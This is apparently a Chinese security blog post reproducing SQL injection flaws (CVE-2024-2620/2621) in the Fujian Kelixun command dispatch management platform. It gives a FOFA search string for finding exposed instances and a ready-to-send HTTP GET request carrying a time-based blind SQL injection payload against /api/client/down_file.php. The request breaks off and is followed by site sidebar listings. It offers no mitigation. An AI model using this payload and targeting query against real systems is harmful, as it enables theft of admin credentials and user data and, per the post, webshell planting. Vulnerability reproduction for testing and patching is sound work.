福建科立讯通信 指挥调度管理平台 SQL注入漏洞复现(CVE-2024-2620、CVE-2024-2621)

0x01 产品简介

福建科立讯通信指挥调度管理平台是一个专门针对通信行业的管理平台。该产品旨在提供高效的指挥调度和管理解决方案,以帮助通信运营商或相关机构实现更好的运营效率和服务质量。该平台提供强大的指挥调度功能,可以实时监控和管理通信网络设备、维护人员和工作任务等。用户可以通过该平台发送指令、调度人员、分配任务,并即时获取现场反馈和报告。

0x02 漏洞概述

福建科立讯通信指挥调度管理平台 down_file.php、pwd_update.php等接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 影响范围

福建科立讯通信调度平台 <= 20240318

0x04 复现环境

FOFA:body="指挥调度管理平台"

0x05 漏洞复现

PoC-1(CVE-2024-2620)

GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123

最近更新

  1. TCP协议是安全的吗?

    2024-03-22 08:40:03       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-03-22 08:40:03       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-03-22 08:40:03       19 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-03-22 08:40:03       20 阅读

热门阅读

  1. AI大模型学习

    2024-03-22 08:40:03       15 阅读
  2. python练习2

    2024-03-22 08:40:03       17 阅读
  3. Tomcat调优

    2024-03-22 08:40:03       16 阅读
  4. HTML世界之标签Ⅵ

    2024-03-22 08:40:03       18 阅读
  5. [Vue]路由

    2024-03-22 08:40:03       19 阅读
  6. 使用pytest和qt实现可勾选测试用例的界面

    2024-03-22 08:40:03       18 阅读
  7. 探索Python中的聚类算法:K-means

    2024-03-22 08:40:03       17 阅读
  8. Macbook安装Go以及镜像设置

    2024-03-22 08:40:03       19 阅读
  9. Springboot中Tomcat配置及切换Undertow

    2024-03-22 08:40:03       16 阅读
  10. ffmpeg开发异步AI推理Filter

    2024-03-22 08:40:03       16 阅读
  11. Ubuntu 23.10 tar包安装和配置Elasticsearch kibana 7.13.3

    2024-03-22 08:40:03       20 阅读